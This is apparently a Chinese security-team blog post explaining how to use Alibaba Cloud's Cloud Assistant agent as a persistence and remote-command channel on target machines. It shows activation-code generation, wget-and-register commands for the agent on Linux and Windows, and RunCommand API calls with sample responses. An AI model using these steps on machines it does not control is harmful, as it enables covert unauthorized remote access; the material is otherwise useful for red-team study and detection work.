利用阿里云云助手进行上线权限维持
简介
云助手是专为云服务器 ECS 打造的原生自动化运维工具,通过免密码、免登录、无需使用跳板机的形式,在 ECS 实例上实现批量运维、执行命令(Shell、PowerShell、Bat等)和发送文件等操作。典型的使用场景包括:安装卸载软件、启动或停止服务、分发配置文件和执行一般的命令(或脚本)等
限制
-
创建的Bat、PowerShell或者Shell脚本和自定义参数在Base64编码后,使用场景与文件大小说明如下: -
创建命令:综合大小不能超过 18 KB -
立即执行并保存命令:综合大小不能超过 18 KB -
立即执行但不保存命令:综合大小不能超过 24 KB -
上传文件:文件大小不能超过 32 KB -
一条命令中,自定义参数的个数不能超过 20个。 -
您只能在以下操作系统中运行云助手命令: -
Alibaba Cloud Linux -
CentOS 6/7/8 及更高版本 -
CoreOS -
Debian 8/9/10及更高版本 -
OpenSUSE -
Rocky Linux -
RedHat 5/6/7 及更高版本 RedHat 中需要您自行下载 rpm 包安装云助手客户端,具体操作,请参考安装云助手客户端:https://help.aliyun.com/document_detail/64921.htm#concept-wtg-32x-ydb -
SUSE Linux Enterprise Server 11/12/15 及更高版本 -
Ubuntu 12/14/16/18 及更高版本 -
Window Server 2012/2016/2019 及更高版本
操作流程
Linux
1、打开阿里云控制台,产品与服务 -> 有服务器 ECS
2、选择运维与监控 -> 云助手 -> 托管实例 -> 创建注册码
3、输入实例名称前缀,点击生成注册码
4、将命令保存下来,在目标机器运行( ActivationCode 仅可在创建的时候可见)
5、在目标机器运行保存的命令
6、查看云助手托管实例是否在线
7、执行命令
Windwos
1、在生成注册码那里将exe手动下载下来
https://aliyun-client-assist.oss-accelerate.aliyuncs.com/windows/aliyun_agent_latest_setup.exe
2、将exe复制到目标机器运行并跟上运行参数
aliyun_agent_latest_setup.exe /S --register --RegionId="cn-shanghai" --ActivationCode="a-sh0xxxxxxxxxxxxxxgtJO2Kg" --ActivationId="AA749DC8-ADFC-5236-BFB9-FBA2AE249558"
3、查看云助手托管实例是否在线
4、点击远程登录执行命令
API 文档
#CreateActivation 创建注册码https://help.aliyun.com/document_detail/200781.html
#DescribeManagedInstances 查看实例IDhttps://help.aliyun.com/document_detail/200857.html
#RunCommand 执行命令https://help.aliyun.com/document_detail/141751.html
#DescribeInvocationResults 获取命令执行结果https://help.aliyun.com/document_detail/64845.html
在线调试
创建注册码:
https://next.api.aliyun.com/api/Ecs/2014-05-26/CreateActivation
查看实例ID:
https://next.api.aliyun.com/api/Ecs/2014-05-26/DescribeManagedInstances
执行命令:
https://next.api.aliyun.com/api/Ecs/2014-05-26/RunCommand
获取命令执行结果:
https://next.api.aliyun.com/api/Ecs/2014-05-26/DescribeInvocationResults
自动化(需要 AccessKeyID 和 AccessKeySecret )
1、生成注册码
https://ecs.aliyuncs.com/?Action=CreateActivation
&RegionId=cn-shanghai
返回结果
HTTP/1.1 200 OK
Content-Type:application/json
{
"RequestId" : "4ECEEE12-56F1-4FBC-9AB1-890F1234****",
"ActivationId" : "4ECEEE12-56F1-4FBC-9AB1-890F1234****",
"ActivationCode" : "a-hz0ch3SwhOlE1234+Xo32lAZC****"
}
保存 ActivationId 和 ActivationCode
2、在机器上运行命令 - 注册实例
sudo wget https://aliyun-client-assist.oss-accelerate.aliyuncs.com/linux/aliyun_assist_latest.rpm
sudo rpm -ivh aliyun_assist_latest.rpm --force
sudo aliyun-service --register --RegionId "cn-shanghai"
--ActivationCode "a-hz0ch3SwhOlE1234+Xo32lAZC****"
--ActivationId "4ECEEE12-56F1-4FBC-9AB1-890F1234****"
3、查看注册实例的 InstanceId
https://ecs.aliyuncs.com/?Action=DescribeManagedInstances
&RegionId=cn-shanghai
返回结果
HTTP/1.1 200 OK
Content-Type:application/json
{
"Instances" : [ {
"MachineId" : "e03231b37ab14e53b5795ad625fc****",
"InstanceId" : "mi-sh03fnca894kveo",
"AgentVersion" : "2.2.0.102",
"Connected" : true,
"InvocationCount" : 1,
"OsVersion" : "Linux_#38~18.04.1-Ubuntu SMP Wed Jan 6 18:26:30 UTC 2021_x86_64",
"ActivationId" : "3704F543-F768-43FA-9864-897F75B3****",
"Hostname" : "demo",
"RegistrationTime" : "2021-01-20T08:57:56Z",
"IntranetIp" : "10.0.**.**",
"InstanceName" : "webAPP-linux-01",
"InternetIp" : "40.65.**.**",
"OsType" : "Linux",
"LastInvokedTime" : "2021-01-20T09:00:40Z"
} ],
"TotalCount" : 1,
"RequestId" : "77115469-F2C5-4ECA-94F7-FA04F2FDC8F4",
"PageSize" : 10,
"PageNumber" : 1
}
4、通过 API 运行机器命令
http(s)://ecs.aliyuncs.com/?Action=RunCommand
&CommandContent=whoami
&InstanceId.1=mi-sh03fnca894kveo
&RegionId=cn-hangzhou
&Type=RunShellScript
返回结果
HTTP/1.1 200 OK
Content-Type:application/json
{
"RequestId" : "E69EF3CC-94CD-42E7-8926-F133B863****",
"CommandId" : "c-7d2a745b412b4601b2d47f6a768d",
"InvokeId" : "t-7d2a745b412b4601b2d47f6a768d****"
}
5、获取命令结果
http(s)://ecs.aliyuncs.com/?Action=DescribeInvocationResults
&RegionId=cn-shanghai
&InstanceId=mi-sh03fnca894kveo
&CommandId=c-7d2a745b412b4601b2d47f6a768d
&PageNumber=1
&PageSize=1
返回结果
HTTP/1.1 200 OK
Content-Type:application/json
{
"RequestId" : "473469C7-AA6F-4DC5-B3DB-A3DC0DE*****",
"Invocation" : {
"InvocationResults" : {
"InvocationResult" : [ {
"Dropped" : 0,
"InvocationStatus" : "Success",
"InstanceId" : "mi-sh03fnca894kveo",
"ExitCode" : 0,
"ErrorInfo" : "the specified instance does not exists",
"StartTime" : "2019-12-20T06:15:55Z",
"Repeats" : 0,
"InvokeRecordStatus" : "Running",
"FinishedTime" : "2019-12-20T06:15:56Z",
"Output" : "MTU6MzA6MDEK",
"CommandId" : "c-hz0jdfwcsr****",
"ErrorCode" : "InstanceNotExists",
"InvokeId" : "t-hz0jdfwd9f****",
"StopTime" : "2020-01-19T09:15:47Z",
"Username" : "root",
"ContainerId" : "ab141ddfbacfe02d9dbc25966ed971536124527097398d419a6746873fea****",
"ContainerName" : "test-container",
"Tags" : [ {
"TagKey" : "owner",
"TagValue" : "zhangsan"
} ]
} ]
},
"TotalCount" : 1,
"PageSize" : 1,
"PageNumber" : 1
}
}
参考文章
https://help.aliyun.com/document_detail/201140.htm#section-fhj-e5i-yr4
欢迎关注我们🎉
原文始发于微信公众号(Evilc0de 安全团队):利用阿里云云助手进行上线权限维持
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论